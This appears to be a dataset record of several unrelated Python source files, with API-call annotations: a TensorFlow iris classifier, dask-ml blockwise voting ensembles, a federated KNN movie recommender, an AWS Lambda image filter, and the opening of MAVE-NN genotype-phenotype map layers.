"bounds['visited']"], {}), "(globalVisited, bounds['visited'])\n", (10932, 10966), True, 'import numpy as np\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
print("start")
# Data sets
IRIS_TRAINING = "iris_training.csv"
IRIS_TEST = "iris_test.csv"
# Load datasets.
# NOTE(review): tf.contrib was removed in TensorFlow 2.x, so this script
# requires a 1.x release; np.int is likewise removed in modern NumPy.
print("load")
training_set = tf.contrib.learn.datasets.base.load_csv(filename=IRIS_TRAINING,
                                                       target_dtype=np.int)
test_set = tf.contrib.learn.datasets.base.load_csv(filename=IRIS_TEST,
                                                   target_dtype=np.int)
print("feature")
# Specify that all features have real-value data
feature_columns = [tf.contrib.layers.real_valued_column("", dimension=4)]
print("classier")
# Build 3 layer DNN with 10, 20, 10 units respectively.
classifier = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns,
                                            hidden_units=[10, 20, 10],
                                            n_classes=3,
                                            model_dir="tmp/iris_model")
# Fit model.
print("fitter")
classifier.fit(x=training_set.data,
               y=training_set.target,
               steps=2000)
# Evaluate accuracy.
print("scorer")
accuracy_score = classifier.evaluate(x=test_set.data,
                                    y=test_set.target)["accuracy"]
print('Accuracy: {0:f}'.format(accuracy_score))
# Classify two new flower samples.
new_samples = np.array(
    [[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]], dtype=float)
y = classifier.predict(new_samples)
print('Predictions: {}'.format(str(y))) | [
"tensorflow.contrib.layers.real_valued_column",
"tensorflow.contrib.learn.datasets.base.load_csv",
"numpy.array",
"tensorflow.contrib.learn.DNNClassifier"
] | [((291, 379), 'tensorflow.contrib.learn.datasets.base.load_csv', 'tf.contrib.learn.datasets.base.load_csv', ([], {'filename': 'IRIS_TRAINING', 'target_dtype': 'np.int'}), '(filename=IRIS_TRAINING,\n target_dtype=np.int)\n', (330, 379), True, 'import tensorflow as tf\n'), ((442, 527), 'tensorflow.contrib.learn.datasets.base.load_csv', 'tf.contrib.learn.datasets.base.load_csv', ([], {'filename': 'IRIS_TEST', 'target_dtype': 'np.int'}), '(filename=IRIS_TEST, target_dtype=np.int\n )\n', (481, 527), True, 'import tensorflow as tf\n'), ((803, 938), 'tensorflow.contrib.learn.DNNClassifier', 'tf.contrib.learn.DNNClassifier', ([], {'feature_columns': 'feature_columns', 'hidden_units': '[10, 20, 10]', 'n_classes': '(3)', 'model_dir': '"""tmp/iris_model"""'}), "(feature_columns=feature_columns,\n hidden_units=[10, 20, 10], n_classes=3, model_dir='tmp/iris_model')\n", (833, 938), True, 'import tensorflow as tf\n'), ((1456, 1523), 'numpy.array', 'np.array', (['[[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]]'], {'dtype': 'float'}), '([[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]], dtype=float)\n', (1464, 1523), True, 'import numpy as np\n'), ((660, 713), 'tensorflow.contrib.layers.real_valued_column', 'tf.contrib.layers.real_valued_column', (['""""""'], {'dimension': '(4)'}), "('', dimension=4)\n", (696, 713), True, 'import tensorflow as tf\n')] |
import dask
import dask.array as da
import dask.dataframe as dd
import numpy as np
import sklearn.base
from sklearn.utils.validation import check_is_fitted
from ..base import ClassifierMixin, RegressorMixin
from ..utils import check_array
class BlockwiseBase(sklearn.base.BaseEstimator):
    """Shared machinery for blockwise ensemble estimators.

    Fits one clone of ``estimator`` per block / partition of a Dask
    collection and stores the fitted clones in ``estimators_``.
    """

    def __init__(self, estimator):
        self.estimator = estimator

    def _check_array(self, X):
        """Validate X, allowing Dask DataFrames and unknown chunk sizes."""
        return check_array(
            X,
            accept_dask_dataframe=True,
            accept_unknown_chunks=True,
            preserve_pandas_dataframe=True,
        )

    def fit(self, X, y, **kwargs):
        """Fit a clone of ``self.estimator`` on each block of ``(X, y)``.

        Parameters
        ----------
        X, y : dask Array or DataFrame
            Must have matching numbers of blocks / partitions.
        **kwargs
            Passed through to each underlying ``fit`` call.

        Returns
        -------
        self
        """
        X = self._check_array(X)
        estimatord = dask.delayed(self.estimator)

        Xs = X.to_delayed()
        ys = y.to_delayed()
        if isinstance(X, da.Array):
            Xs = Xs.flatten()
        if isinstance(y, da.Array):
            ys = ys.flatten()

        if len(Xs) != len(ys):
            raise ValueError(
                f"The number of blocks in X and y must match. {len(Xs)} != {len(ys)}"
            )

        # One independent clone per block; all fits run in a single compute.
        estimators = [
            dask.delayed(sklearn.base.clone)(estimatord) for _ in range(len(Xs))
        ]
        results = [
            estimator_.fit(X_, y_, **kwargs)
            for estimator_, X_, y_, in zip(estimators, Xs, ys)
        ]
        results = list(dask.compute(*results))
        self.estimators_ = results
        # Follow the scikit-learn convention of returning the fitted
        # estimator so calls can be chained (previously returned None).
        return self

    def _predict(self, X):
        """Collect results from many predict calls"""
        # Classifiers vote with integer labels; regressors average floats.
        if isinstance(self, ClassifierMixin):
            dtype = "int64"
        else:
            dtype = "float64"

        if isinstance(X, da.Array):
            # one output column per fitted sub-estimator
            chunks = (X.chunks[0], len(self.estimators_))
            combined = X.map_blocks(
                _predict_stack,
                estimators=self.estimators_,
                dtype=np.dtype(dtype),
                chunks=chunks,
            )
        elif isinstance(X, dd._Frame):
            # NOTE(review): uses self.classes_, which only classifier
            # subclasses define -- confirm regressors never hit this path
            # with a DataFrame.
            meta = np.empty((0, len(self.classes_)), dtype=dtype)
            combined = X.map_partitions(
                _predict_stack, estimators=self.estimators_, meta=meta
            )
        else:
            # TODO: this should be done in parallel?
            combined = np.vstack(
                [estimator.predict(X) for estimator in self.estimators_]
            ).T
        return combined
class BlockwiseVotingClassifier(ClassifierMixin, BlockwiseBase):
    """
    Blockwise training and ensemble voting classifier.
    This classifier trains on blocks / partitions of Dask Arrays or DataFrames.
    A cloned version of `estimator` will be fit *independently* on each block
    or partition of the Dask collection. This is useful when the sub estimator
    only works on small in-memory data structures like a NumPy array or pandas
    DataFrame.
    Prediction is done by the *ensemble* of learned models.
    .. warning::
       Ensure that your data are sufficiently shuffled prior to training!
       If the values of the various blocks / partitions of your dataset are not
       distributed similarly, the classifier will give poor results.
    Parameters
    ----------
    estimator : Estimator
    voting : str, {'hard', 'soft'} (default='hard')
        If 'hard', uses predicted class labels for majority rule voting.
        Else if 'soft', predicts the class label based on the argmax of
        the sums of the predicted probabilities, which is recommended for
        an ensemble of well-calibrated classifiers.
    classes : list-like, optional
        The set of classes that `y` can take. This can also be provided as
        a fit param if the underlying estimator requires `classes` at fit time.
    Attributes
    ----------
    estimators_ : list of classifiers
        The collection of fitted sub-estimators that are `estimator` fitted
        on each partition / block of the inputs.
    classes_ : array-like, shape (n_predictions,)
        The class labels.
    Examples
    --------
    >>> import dask_ml.datasets
    >>> import dask_ml.ensemble
    >>> import sklearn.linear_model
    >>> X, y = dask_ml.datasets.make_classification(n_samples=100_000,
    >>> ...     chunks=10_000)
    >>> subestimator = sklearn.linear_model.RidgeClassifier(random_state=0)
    >>> clf = dask_ml.ensemble.BlockwiseVotingClassifier(
    >>> ...     subestimator,
    >>> ...     classes=[0, 1]
    >>> ... )
    >>> clf.fit(X, y)
    """
    def __init__(self, estimator, voting="hard", classes=None):
        self.voting = voting
        self.classes = classes
        super().__init__(estimator)
    def fit(self, X, y, **kwargs):
        """Fit one sub-estimator per block and record the class labels."""
        # The full label set must be supplied up front (constructor or fit
        # kwarg) because an individual block may not contain every class.
        if self.classes is None and "classes" not in kwargs:
            raise ValueError("Must provide the classes of `y`.")
        elif self.classes is not None:
            classes = self.classes
        else:
            classes = kwargs["classes"]
        super().fit(X, y, **kwargs)
        self.classes_ = np.array(classes)
    def predict(self, X):
        """Predict class labels by hard or soft voting over the ensemble."""
        check_is_fitted(self, attributes=["estimators_"])
        X = self._check_array(X)
        # TODO: check for just row-wise partition!
        if self.voting == "soft":
            # argmax over the averaged class probabilities
            maj = np.argmax(self.predict_proba(X), axis=1)
        else: # 'hard' voting
            predictions = self._predict(X) # (N, n_estimators) ensure chunking!
            if isinstance(predictions, da.Array):
                # drop_axis=1: each row of votes collapses to one label
                maj = predictions.map_blocks(_vote_block, dtype="int64", drop_axis=1)
            else:
                maj = _vote_block(predictions)
        return maj
    @property
    def predict_proba(self):
        # Exposed as a property so that accessing it under hard voting
        # raises AttributeError, mirroring sklearn's VotingClassifier.
        if self.voting == "hard":
            raise AttributeError(
                "predict_proba is not available when" " voting=%r" % self.voting
            )
        return self._predict_proba
    def _predict_proba(self, X):
        """Average the per-estimator class probabilities."""
        check_is_fitted(self, attributes=["estimators_"])
        X = self._check_array(X)
        # mean over the estimator axis of the (n_estimators, N, n_classes) stack
        avg = np.average(self._collect_probas(X), axis=0)
        return avg
    def _collect_probas(self, X):
        """Stack predict_proba outputs: (n_estimators, len(X), n_classes)."""
        if isinstance(X, da.Array):
            chunks = (len(self.estimators_), X.chunks[0], len(self.classes_))
            meta = np.array([], dtype="float64")
            # (n_estimators, len(X), n_classes)
            combined = X.map_blocks(
                _predict_proba_stack,
                estimators=self.estimators_,
                chunks=chunks,
                meta=meta,
            )
        elif isinstance(X, dd._Frame):
            # TODO: replace with a _predict_proba_stack version.
            # This current raises; dask.dataframe doesn't like map_partitions that
            # return new axes.
            # meta = np.empty((len(self.estimators_), 0, len(self.classes_)),
            #                 dtype="float64")
            # combined = X.map_partitions(_predict_proba_stack, meta=meta,
            #                             estimators=self.estimators_)
            # combined._chunks = ((len(self.estimators_),),
            #                     (np.nan,) * X.npartitions,
            #                     (len(X.columns),))
            meta = np.empty((0, len(self.classes_)), dtype="float64")
            probas = [
                X.map_partitions(_predict_proba, meta=meta, estimator=estimator)
                for estimator in self.estimators_
            ]
            # TODO(https://github.com/dask/dask/issues/6177): replace with da.stack
            chunks = probas[0]._chunks
            for proba in probas:
                proba._chunks = ((1,) * len(chunks[0]), chunks[1])
            combined = da.stack(probas)
            combined._chunks = ((1,) * len(self.estimators_),) + chunks
        else:
            # ndarray, etc.
            combined = np.stack(
                [estimator.predict_proba(X) for estimator in self.estimators_]
            )
        return combined
class BlockwiseVotingRegressor(RegressorMixin, BlockwiseBase):
    """
    Blockwise training and ensemble voting regressor.
    This regressor trains on blocks / partitions of Dask Arrays or DataFrames.
    A cloned version of `estimator` will be fit *independently* on each block
    or partition of the Dask collection.
    Prediction is done by the *ensemble* of learned models.
    .. warning::
       Ensure that your data are sufficiently shuffled prior to training!
       If the values of the various blocks / partitions of your dataset are not
       distributed similarly, the regressor will give poor results.
    Parameters
    ----------
    estimator : Estimator
    Attributes
    ----------
    estimators_ : list of regressors
        The collection of fitted sub-estimators that are `estimator` fitted
        on each partition / block of the inputs.
    Examples
    --------
    >>> import dask_ml.datasets
    >>> import dask_ml.ensemble
    >>> import sklearn.linear_model
    >>> X, y = dask_ml.datasets.make_regression(n_samples=100_000,
    ...                                          chunks=10_000)
    >>> subestimator = sklearn.linear_model.LinearRegression()
    >>> clf = dask_ml.ensemble.BlockwiseVotingRegressor(
    ...     subestimator,
    ... )
    >>> clf.fit(X, y)
    """
    def predict(self, X):
        """Predict by averaging the sub-estimators' predictions row-wise."""
        check_is_fitted(self, attributes=["estimators_"])
        # mean over the estimator axis of the (n_rows, n_estimators) matrix
        return np.average(self._predict(X), axis=1)
def fit(estimator, x, y):
    """Fit ``estimator`` in place on ``(x, y)`` and hand it back.

    Thin helper so a single fit call can be scheduled as a task.
    """
    # TODO: logging
    fitted = estimator
    fitted.fit(x, y)
    return fitted
def _predict_proba(part, estimator):
return estimator.predict_proba(part)
def _vote(x):
return np.argmax(np.bincount(x))
def _vote_block(block):
    """Majority-vote each row of a (samples, estimators) prediction block."""
    return np.apply_along_axis(_vote, axis=1, arr=block)
def _predict_stack(part, estimators):
# predict for a batch of estimators and stack up the results.
batches = [estimator.predict(part) for estimator in estimators]
return np.vstack(batches).T
def _predict_proba_stack(part, estimators):
# predict for a batch of estimators and stack up the results.
batches = [estimator.predict_proba(part) for estimator in estimators]
return np.stack(batches)
| [
"numpy.stack",
"dask.delayed",
"numpy.dtype",
"dask.array.stack",
"sklearn.utils.validation.check_is_fitted",
"numpy.apply_along_axis",
"numpy.array",
"dask.compute",
"numpy.bincount",
"numpy.vstack"
] | [((9580, 9616), 'numpy.apply_along_axis', 'np.apply_along_axis', (['_vote', '(1)', 'block'], {}), '(_vote, 1, block)\n', (9599, 9616), True, 'import numpy as np\n'), ((10020, 10037), 'numpy.stack', 'np.stack', (['batches'], {}), '(batches)\n', (10028, 10037), True, 'import numpy as np\n'), ((660, 688), 'dask.delayed', 'dask.delayed', (['self.estimator'], {}), '(self.estimator)\n', (672, 688), False, 'import dask\n'), ((4934, 4951), 'numpy.array', 'np.array', (['classes'], {}), '(classes)\n', (4942, 4951), True, 'import numpy as np\n'), ((4987, 5036), 'sklearn.utils.validation.check_is_fitted', 'check_is_fitted', (['self'], {'attributes': "['estimators_']"}), "(self, attributes=['estimators_'])\n", (5002, 5036), False, 'from sklearn.utils.validation import check_is_fitted\n'), ((5831, 5880), 'sklearn.utils.validation.check_is_fitted', 'check_is_fitted', (['self'], {'attributes': "['estimators_']"}), "(self, attributes=['estimators_'])\n", (5846, 5880), False, 'from sklearn.utils.validation import check_is_fitted\n'), ((9215, 9264), 'sklearn.utils.validation.check_is_fitted', 'check_is_fitted', (['self'], {'attributes': "['estimators_']"}), "(self, attributes=['estimators_'])\n", (9230, 9264), False, 'from sklearn.utils.validation import check_is_fitted\n'), ((9527, 9541), 'numpy.bincount', 'np.bincount', (['x'], {}), '(x)\n', (9538, 9541), True, 'import numpy as np\n'), ((9802, 9820), 'numpy.vstack', 'np.vstack', (['batches'], {}), '(batches)\n', (9811, 9820), True, 'import numpy as np\n'), ((1316, 1338), 'dask.compute', 'dask.compute', (['*results'], {}), '(*results)\n', (1328, 1338), False, 'import dask\n'), ((6159, 6188), 'numpy.array', 'np.array', (['[]'], {'dtype': '"""float64"""'}), "([], dtype='float64')\n", (6167, 6188), True, 'import numpy as np\n'), ((1076, 1108), 'dask.delayed', 'dask.delayed', (['sklearn.base.clone'], {}), '(sklearn.base.clone)\n', (1088, 1108), False, 'import dask\n'), ((7577, 7593), 'dask.array.stack', 'da.stack', (['probas'], {}), 
'(probas)\n', (7585, 7593), True, 'import dask.array as da\n'), ((1806, 1821), 'numpy.dtype', 'np.dtype', (['dtype'], {}), '(dtype)\n', (1814, 1821), True, 'import numpy as np\n')] |
import numpy as np
import pandas as pd
from definitions import ROOT_DIR
import logging.config
import helpers
from data_handler import DataHandler
from knn_user import KNNUser
DS_PATH = ROOT_DIR + "/datasets/ml-latest-small"
class SimpleKNNFederator:
    """Split the ratings dataset into interleaved subsets, run KNN on each,
    federate the per-subset recommendations, and score the federated list
    against a single "golden" run on the whole dataset.

    NOTE(review): all of the work happens in the constructor (including
    file I/O and logging), so instantiating this class is expensive.
    """
    logging.config.fileConfig(ROOT_DIR + "/logging.conf", disable_existing_loggers=False)
    log = logging.getLogger(__name__)
    def __init__(self, user_id, n, base_n):
        # n: length of the federated recommendation list;
        # base_n: normalizer used when scoring against the golden list.
        ds_base_path = "/datasets/ml-latest-small"
        ds_path = ROOT_DIR + ds_base_path + "/ratings.csv"
        movie_id_col = 1
        self.log.info("Golden List:")
        num_of_recs = 20
        # Golden list: recommendations from a KNN over the full dataset.
        golden_list = KNNUser(user_id, data_path=ds_base_path, p_thresh=5, u_thresh=5).make_recommendation(num_of_recs)
        data = DataHandler(filename=ds_path, dtype=np.uint32, cols=4)
        # Sort by movie id so the intermittent split spreads each movie's
        # ratings across subsets.
        data.set_dataset(data.sort_dataset_by_col(movie_id_col))
        num_of_alg_subsets = 5
        split_datasets = data.split_dataset_intermittently(num_of_alg_subsets)
        split_recommendations = self.knn_split_datasets(split_datasets, user_id, num_of_recs)
        federated_recommendations = self.federate_split_recommendations(split_recommendations, n)
        helpers.pretty_print_results(self.log, federated_recommendations, user_id)
        self.log.info("Score: %.3f" % self.measure_effectiveness(federated_recommendations, n, golden_list, base_n))
    # TODO: put in a different helper file
    def knn_split_datasets(self, split_datasets, user_id, num_of_recs=20):
        """Run KNN per subset and return all recommendations concatenated,
        sorted ascending by distance (column 2)."""
        split_recommendations = []
        for i in range(len(split_datasets)):
            knnu = KNNUser(user_id, ds_ratings=helpers.convert_np_to_pandas(split_datasets[i]),
                           p_thresh=0, u_thresh=0)
            split_recommendations.append(knnu.make_recommendation(num_of_recs=num_of_recs))
        a = np.concatenate(split_recommendations)
        return a[a[:, 2].argsort()] # sort the array by distance
    @staticmethod
    def federate_split_recommendations(recommendations, n):
        """Take the n closest distinct titles from the distance-sorted pool.

        NOTE(review): raises IndexError if the pool holds fewer than n
        distinct names -- confirm whether that can happen in practice.
        """
        federated_recommendations = []
        chosen_names = []
        entries = 0
        count = 0
        while entries < n:
            movie = recommendations[count]
            name = movie[1]
            dist = movie[2]
            if name not in chosen_names:
                chosen_names.append(name)
                federated_recommendations.append([entries+1, name, dist])
                entries += 1
            count += 1
        return federated_recommendations
    def measure_effectiveness(self, actual, actual_n, golden, golden_n): # TODO: Replace with a real metric measurer
        """Ad-hoc score in (…, 1.0]: start at 1 and subtract a penalty per
        federated entry -- a rank-difference penalty if the title is in
        the golden list, a full 1/actual_n penalty if it is missing."""
        golden_dict = {}
        score = 1.0
        for row in golden:
            golden_dict[row[1]] = row[0]
        for row in actual:
            name = row[1]
            position = row[0]
            if name in golden_dict:
                score -= (1/actual_n)*((abs(golden_dict[name] - position))/golden_n)
            else:
                score -= (1/actual_n)
        return score
# Test with user 1
if __name__ == '__main__':
    # Smoke test: build and score a federated recommendation list for one
    # user. Despite the names, these values are passed as `n` (federated
    # list length) and `base_n` (golden-list normalizer), not as KNN
    # neighbour counts -- confirm the intended naming.
    user_id = 1
    n_neighbours = 20
    base_n_neighbours = 200
    federator = SimpleKNNFederator(user_id, n_neighbours, base_n_neighbours)
| [
"helpers.convert_np_to_pandas",
"knn_user.KNNUser",
"data_handler.DataHandler",
"helpers.pretty_print_results",
"numpy.concatenate"
] | [((762, 816), 'data_handler.DataHandler', 'DataHandler', ([], {'filename': 'ds_path', 'dtype': 'np.uint32', 'cols': '(4)'}), '(filename=ds_path, dtype=np.uint32, cols=4)\n', (773, 816), False, 'from data_handler import DataHandler\n'), ((1192, 1266), 'helpers.pretty_print_results', 'helpers.pretty_print_results', (['self.log', 'federated_recommendations', 'user_id'], {}), '(self.log, federated_recommendations, user_id)\n', (1220, 1266), False, 'import helpers\n'), ((1834, 1871), 'numpy.concatenate', 'np.concatenate', (['split_recommendations'], {}), '(split_recommendations)\n', (1848, 1871), True, 'import numpy as np\n'), ((648, 712), 'knn_user.KNNUser', 'KNNUser', (['user_id'], {'data_path': 'ds_base_path', 'p_thresh': '(5)', 'u_thresh': '(5)'}), '(user_id, data_path=ds_base_path, p_thresh=5, u_thresh=5)\n', (655, 712), False, 'from knn_user import KNNUser\n'), ((1630, 1677), 'helpers.convert_np_to_pandas', 'helpers.convert_np_to_pandas', (['split_datasets[i]'], {}), '(split_datasets[i])\n', (1658, 1677), False, 'import helpers\n')] |
import json
import urllib.parse
import boto3
print('Loading function')
s3 = boto3.client('s3')
import os
def lambda_handler(event, context):
    """S3-triggered Lambda: fetch the uploaded image, extract a text-like
    edge image, composite it onto a blackboard background, and upload two
    JPEGs back to S3 (the composite and a 1.91:1 padded variant for FB).

    Returns the source object's Content-Type on success; re-raises any
    failure after logging it.

    Fix: the 768x403 fallback previously assigned ``new_height`` (unused)
    instead of the misspelled ``new_heigt`` that the resize reads, so the
    fallback size never took effect.
    """
    # Get the object from the event and show its content type
    bucket = event['Records'][0]['s3']['bucket']['name']
    key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')
    try:
        print(os.listdir('/opt/python/lib/python3.7/site-packages'))
        import cv2
        import numpy as np
        # read image from s3
        response = s3.get_object(Bucket=bucket, Key=key)
        print("CONTENT TYPE: " + response['ContentType'])
        body = response['Body'].read()
        #
        src = cv2.imdecode(np.asarray(bytearray(body)), cv2.IMREAD_GRAYSCALE)
        # Resize to TARGET x TARGET in landscape or portrait
        TARGET = 512
        TARGET_PORTRAIT = 350
        org_height = src.shape[0]
        org_width = src.shape[1]
        scale_percent = 1
        landscape = True
        portrait_style = False
        if (org_height>org_width):
            scale_percent = TARGET_PORTRAIT / org_height
            landscape = False
            portrait_style = True
        else:
            scale_percent = TARGET / org_width
            resulting_height = int(src.shape[0] * scale_percent)
            if (resulting_height>TARGET_PORTRAIT):
                scale_percent = TARGET_PORTRAIT / org_height
                landscape = False
        # new size
        width = int(src.shape[1] * scale_percent)
        height = int(src.shape[0] * scale_percent)
        dsize = (width, height)
        src = cv2.resize(src, dsize)
        # apply guassian blur on src image
        src = cv2.GaussianBlur(src,(3,3),cv2.BORDER_DEFAULT)
        src = cv2.Sobel(src,cv2.CV_8U,1,1,ksize=5)
        # stretch contrast so the 97th-percentile edge maps near white
        top_pixel = np.percentile(src,97)
        src = cv2.convertScaleAbs(src, alpha=(250/top_pixel), beta=0)
        src = cv2.GaussianBlur(src,(3,3),cv2.BORDER_DEFAULT)
        # read background from local layer
        bck = cv2.imread('/opt/python/blackboard/blackboard_wide_2.png', cv2.IMREAD_GRAYSCALE)
        beta = 0.6
        offset_x = 250
        offset_y = 5
        # additive blend of the edge image onto the blackboard, clamped to 255
        for y in range(src.shape[0]):
            for x in range(src.shape[1]):
                new_pixel = bck[y+offset_y,x+offset_x]+beta*src[y,x];
                new_pixel = 255 if new_pixel > 255 else new_pixel
                bck[y+offset_y,x+offset_x] = np.uint8(new_pixel)
        if not landscape:
            # clip image
            actual_width = offset_x + src.shape[1] + 5
            actual_width = actual_width if actual_width < 768 else 767
            bck = bck[:,0:actual_width]
        # put image back to public s3 bucket
        image_string = cv2.imencode('.jpg', bck)[1].tostring()
        s3.put_object(Bucket='<bucket-name>', Key=key+'.jpg', Body=image_string)
        # resize to 1.91 : 1 scale for FB
        alpha = 1.905
        ww = bck.shape[1]
        hh = bck.shape[0]
        min_h = -(alpha * hh - ww) / 2 / alpha
        dh = 0
        dw = 0
        if min_h >= 0:
            v_h = - (alpha * hh - ww) * (alpha * hh - ww) / 4 / alpha
            if v_h > 0:
                dh = min_h
                dw = alpha*(dh+hh)-ww
            else:
                dw = 0
                dh = (dw + ww)/alpha - hh
        else:
            #v_h = - (alpha * hh - ww) * (alpha * hh - ww) / 4 / alpha
            #if v_h >= 0:
            #    dh = 0
            #    dw = alpha*(dh+hh)-ww
            #else:
            #    dw = 0
            #    dh = (dw + ww)/alpha - hh
            dh = 0
            dw = alpha*(dh+hh)-ww
        dh = int(dh)
        dw = int(dw)
        if dh<0 or dw<0:
            print('false compute '+str(dh)+' '+str(dw))
            dh = 0
            dw = 0
        if dh>300 or dw > 600:
            print('too large values '+str(dh)+' '+str(dw))
            dh = 0
            dw = 0
        top, bottom = dh//2, dh-(dh//2)
        left, right = dw//2, dw-(dw//2)
        color = [0, 0, 0]
        extended = cv2.copyMakeBorder(bck, top, bottom, left, right, cv2.BORDER_CONSTANT,value=color)
        #extended = cv2.copyMakeBorder(bck, top, bottom, left, right, cv2.BORDER_REFLECT)
        # ensure min width for large scale display
        scale_factor = 768/extended.shape[1]
        new_width = int(scale_factor*extended.shape[1])
        new_heigt = int(scale_factor*extended.shape[0])
        if dh==0 and dw==0:
            ...
        else:
            new_width = 768
            # BUGFIX: was `new_height = 403` (a different, unused variable),
            # so the resize below never saw the 768x403 target.
            new_heigt = 403
        scaled_just_photo_dsize = (new_width,new_heigt)
        extended = cv2.resize(extended, scaled_just_photo_dsize)
        extended_string_photo = cv2.imencode('.jpg', extended)[1].tostring()
        s3.put_object(Bucket='<bucket-name>', Key=key+'-url.jpg', Body=extended_string_photo)
        return response['ContentType']
        #actual_width = offset_x + src.shape[1] + 5
        #actual_width = actual_width if actual_width < 768 else 767
        #actual_height = offset_y + src.shape[0] + 5
        #actual_height = actual_height if actual_height < 360 else 359
        #just_photo = bck[0:actual_height,offset_x:actual_width]
        #scale_factor = 2
        #if portrait_style:
        #    scale_factor = 3
        #scaled_just_photo_dsize = (scale_factor*just_photo.shape[1],scale_factor*just_photo.shape[0])
        #scaled_just_photo = cv2.resize(just_photo, scaled_just_photo_dsize)
        #image_string_photo = cv2.imencode('.jpg', scaled_just_photo)[1].tostring()
        #s3.put_object(Bucket='<bucket-name>', Key=key+'-url.jpg', Body=image_string_photo)
        #return response['ContentType']
    except Exception as e:
        print(e)
        print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))
        raise e
| [
"os.listdir",
"cv2.GaussianBlur",
"numpy.uint8",
"boto3.client",
"cv2.copyMakeBorder",
"numpy.percentile",
"cv2.imread",
"cv2.convertScaleAbs",
"cv2.imencode",
"cv2.Sobel",
"cv2.resize"
] | [((78, 96), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (90, 96), False, 'import boto3\n'), ((1731, 1753), 'cv2.resize', 'cv2.resize', (['src', 'dsize'], {}), '(src, dsize)\n', (1741, 1753), False, 'import cv2\n'), ((1825, 1874), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['src', '(3, 3)', 'cv2.BORDER_DEFAULT'], {}), '(src, (3, 3), cv2.BORDER_DEFAULT)\n', (1841, 1874), False, 'import cv2\n'), ((1886, 1926), 'cv2.Sobel', 'cv2.Sobel', (['src', 'cv2.CV_8U', '(1)', '(1)'], {'ksize': '(5)'}), '(src, cv2.CV_8U, 1, 1, ksize=5)\n', (1895, 1926), False, 'import cv2\n'), ((1952, 1974), 'numpy.percentile', 'np.percentile', (['src', '(97)'], {}), '(src, 97)\n', (1965, 1974), True, 'import numpy as np\n'), ((1997, 2052), 'cv2.convertScaleAbs', 'cv2.convertScaleAbs', (['src'], {'alpha': '(250 / top_pixel)', 'beta': '(0)'}), '(src, alpha=250 / top_pixel, beta=0)\n', (2016, 2052), False, 'import cv2\n'), ((2067, 2116), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['src', '(3, 3)', 'cv2.BORDER_DEFAULT'], {}), '(src, (3, 3), cv2.BORDER_DEFAULT)\n', (2083, 2116), False, 'import cv2\n'), ((2180, 2265), 'cv2.imread', 'cv2.imread', (['"""/opt/python/blackboard/blackboard_wide_2.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('/opt/python/blackboard/blackboard_wide_2.png', cv2.IMREAD_GRAYSCALE\n )\n", (2190, 2265), False, 'import cv2\n'), ((4264, 4351), 'cv2.copyMakeBorder', 'cv2.copyMakeBorder', (['bck', 'top', 'bottom', 'left', 'right', 'cv2.BORDER_CONSTANT'], {'value': 'color'}), '(bck, top, bottom, left, right, cv2.BORDER_CONSTANT,\n value=color)\n', (4282, 4351), False, 'import cv2\n'), ((4844, 4889), 'cv2.resize', 'cv2.resize', (['extended', 'scaled_just_photo_dsize'], {}), '(extended, scaled_just_photo_dsize)\n', (4854, 4889), False, 'import cv2\n'), ((401, 454), 'os.listdir', 'os.listdir', (['"""/opt/python/lib/python3.7/site-packages"""'], {}), "('/opt/python/lib/python3.7/site-packages')\n", (411, 454), False, 'import os\n'), ((2585, 2604), 'numpy.uint8', 'np.uint8', 
(['new_pixel'], {}), '(new_pixel)\n', (2593, 2604), True, 'import numpy as np\n'), ((2903, 2928), 'cv2.imencode', 'cv2.imencode', (['""".jpg"""', 'bck'], {}), "('.jpg', bck)\n", (2915, 2928), False, 'import cv2\n'), ((4931, 4961), 'cv2.imencode', 'cv2.imencode', (['""".jpg"""', 'extended'], {}), "('.jpg', extended)\n", (4943, 4961), False, 'import cv2\n')] |
"""gpmap.py: Defines layers representing G-P maps."""
# Standard imports
import numpy as np
from collections.abc import Iterable
import pdb
# Tensorflow imports
import tensorflow as tf
import tensorflow.keras.backend as K
from tensorflow.keras.initializers import Constant
from tensorflow.keras.layers import Layer, Dense
# MAVE-NN imports
from mavenn.src.error_handling import check, handle_errors
class GPMapLayer(Layer):
    """
    Represents a general genotype-phenotype map.

    Specific functional forms for G-P maps should be
    represented by derived classes of this layer.

    Parameters
    ----------
    L: (int)
        Sequence length.
    C: (int)
        Alphabet size (number of characters per position).
    theta_regularization: (float)
        L2 regularization strength applied to all theta parameters.
    mask_type: (str or None)
        Optional interaction-mask type; interpreted by derived classes.
    """

    @handle_errors
    def __init__(self,
                 L,
                 C,
                 theta_regularization,
                 mask_type=None):
        """Construct layer instance."""

        # Set sequence length
        self.L = L

        # Set alphabet length
        self.C = C

        # Set regularization contribution
        self.theta_regularization = theta_regularization

        # Set regularizer; shared by all weights created in derived classes
        self.regularizer = tf.keras.regularizers.L2(self.theta_regularization)

        # Set mask type
        self.mask_type = mask_type

        # Call superclass constructor
        super().__init__()

    @handle_errors
    def get_config(self):
        """Return configuration dictionary."""
        # NOTE(review): super(Layer, self) deliberately skips Layer's own
        # get_config in the MRO -- confirm this is intended rather than a
        # typo for super().get_config().
        base_config = super(Layer, self).get_config()
        return {'L': self.L,
                'C': self.C,
                'theta_regularization': self.theta_regularization,
                **base_config}

    @handle_errors
    def build(self, input_shape):
        """Build layer."""
        super().build(input_shape)

    ### The following methods must be fully overridden

    def call(self, inputs):
        """Process layer input and return output. Must be overridden."""
        # Raise instead of `assert False`: asserts are stripped under
        # `python -O`, which would have silently returned np.nan here.
        raise NotImplementedError(
            'call() must be overridden by GPMapLayer subclasses.')

    def set_params(self, **kwargs):
        """Set values of layer parameters. Must be overridden."""
        raise NotImplementedError(
            'set_params() must be overridden by GPMapLayer subclasses.')

    def get_params(self):
        """Get values of layer parameters. Must be overridden."""
        raise NotImplementedError(
            'get_params() must be overridden by GPMapLayer subclasses.')
class CustomGPMapLayer(Layer):
    """
    Represents a custom genotype-phenotype map
    where user has to provide implementation via
